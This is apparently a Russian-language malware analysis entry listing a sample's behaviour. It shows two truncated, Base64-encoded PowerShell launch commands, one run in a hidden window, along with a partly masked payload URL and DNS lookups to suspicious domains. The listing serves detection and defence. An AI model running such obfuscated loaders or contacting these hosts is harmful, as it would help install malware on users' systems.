Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAGwAZQByAGMAdgB0AGwAPQAnAFMAdABxAGcAaQB2AHQAawBrACcAOwAkAFoAegBrAGEAYgBmAGcAbABiACAAPQAgACcAOQAxAD...
- http://co####t360bd.com/cgi-bin/q6GHjb9Ua/
- DNS ASK zh.sg
- DNS ASK dp##nce.org
- DNS ASK da##14.com
- DNS ASK we####eronline.com
- DNS ASK co####t360bd.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAGwAZQByAGMAdgB0AGwAPQAnAFMAdABxAGcAaQB2AHQAawBrACcAOwAkAFoAegBrAGEAYgBmAGcAbABiACAAPQAgACcAOQAxAD...' (со скрытым окном)